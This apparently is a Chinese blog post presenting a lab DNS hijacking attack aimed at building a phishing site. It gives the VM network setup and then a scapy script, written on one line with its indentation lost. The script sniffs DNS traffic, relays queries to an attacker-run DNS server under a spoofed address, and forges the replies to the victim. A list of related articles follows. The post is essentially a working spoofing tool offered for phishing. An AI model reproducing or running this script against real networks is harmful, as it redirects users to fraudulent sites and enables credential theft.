中级DNS劫持,做钓鱼网站。
2019-06-11 07:30
2486 查看
环境:
配置一个目标网站www.wf.com
设置dns解析www.wf.com
网卡:192.168.88.2
Win7 被欺骗的 ip:192.168.88.143
Win server 2008 DNS服务器 ip:192.168.88.136
选择自己所在的网卡
代码如下:
from scapy.all import * dnss="192.168.88.136" xwlan="VMware Virtual Ethernet Adapter for VMnet8" def task(p): try: pip=p[IP] pudp=p[UDP] pdns=p[DNS] if p.dport==53 and pip.dst=="192.168.88.2": #请求包 #192.168.88.1给假dns发包 send(IP(src="192.168.88.1",dst=dnss,ttl=55)/UDP(sport=p.sport,dport=53)/pdns,iface=xwlan) mm=pip.src print(mm) print("转发查询成功",mm) #假dns发包给192.168.88.1回包 elif p.sport==53 and pip.src==dnss: #响应包 #开始造给目标主句造一个假包 mm=pip.src send(IP(src="192.168.88.2",dst=mm,ttl=55)/UDP(sport=53,dport=p.dport)/pdns,iface=xwlan) wz=pdns.qname.decode() print(wz,"转发响应成功") #except Exception as e: #print(e) except: pass print("开始攻击") sniff(iface=xwlan,filter="udp port 53",timeout=300,prn=task)
劫持成功
抓包分析
相关文章推荐
- 网站被劫持了win8.1如何设置DNS解除拦截
- 网站dns被劫持,网站域名被劫持,域名跳转到别的网站的最新解决方法
- 修复运营商网站劫持,Win8.1怎么修改DNS
- 网站app被劫持怎么办?HTTPDNS阿里云域名防劫持, DNSPod 移动解析服务 D+
- 大型网站用户定位技术(智能 DNS 和 IP 重定向)
- 遭遇DNS劫持
- DNS 域名劫持、域名污染
- 本地主机DNS劫持演示及防范
- 局域网内DNS劫持方法
- 3、新手建个人网站教程--域名解析(DNS)
- 黄阶中级-《大型网站技术架构》- 概述 - 修改0次
- 钓鱼网站排名出炉:“建设银行”成榜首
- 【每日安全资讯】暴雪游戏存在DNS重绑定漏洞可导致玩家电脑被远程劫持
- 金山安全实验室公布中国互联网六大类钓鱼网站
- 使用dnspod进行简单的HTTP dns解析(防劫持)
- 3月钓鱼网站简报:.COM域名超68% 中国数据居二
- 简单说说DNS劫持_firefox吧_百度贴吧
- 淘宝故意拦截浏览器,要求升级而且还出现了一些账号搜索到的商品被劫持,还是开自己的网站商店为好。
- 电脑被dns劫持